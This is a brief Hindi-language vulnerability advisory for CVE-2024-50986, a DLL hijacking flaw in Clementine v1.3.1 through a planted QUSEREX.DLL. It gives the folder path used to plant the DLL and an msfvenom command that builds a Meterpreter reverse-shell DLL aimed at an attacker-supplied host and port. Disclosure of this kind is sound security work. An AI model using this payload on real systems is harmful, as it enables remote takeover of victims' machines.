
Clementine v.1.3.1 में एक समस्या एक स्थानीय हमलावर को एक निर्मित DLL फ़ाइल (DLL हाइजैकिंग) के माध्यम से मनमाना कोड निष्पादित करने की अनुमति देती है।
विवरण: Clementine v.1.3.1 में एक समस्या एक स्थानीय हमलावर को क्राफ्टेड DLL फ़ाइल के माध्यम से मनमाना कोड निष्पादित करने की अनुमति देती है।
प्रभावित संस्करण: Clementine v.1.3.1
शोधकर्ता: Utkarsh (r1971d3) LinkedIn
NIST CVE लिंक: https://nvd.nist.gov/vuln/detail/CVE-2024-50986
कमजोरी का प्रकार: अविश्वसनीय खोज पथ
प्रभावित घटक: QUSEREX.DLL
इस कमजोरी का फायदा उठाने के लिए, एक हमलावर को QUSEREX.DLL नामक एक दुर्भावनापूर्ण DLL बनाना होगा और इसे निर्देशिका C:\Users<username>\AppData\Local\Microsoft\WindowsApps\ में रखना होगा। जब Clementine एप्लिकेशन लॉन्च किया जाता है, तो यह दुर्भावनापूर्ण DLL को लोड करेगा, जिससे हमलावर का कोड निष्पादित होगा।


sudo msfvenom -p windows/meterpreter/reverse_tcp -ax86 -f dll LHOST=<IP Address> LPORT=<Port> > QUSEREX.DLL



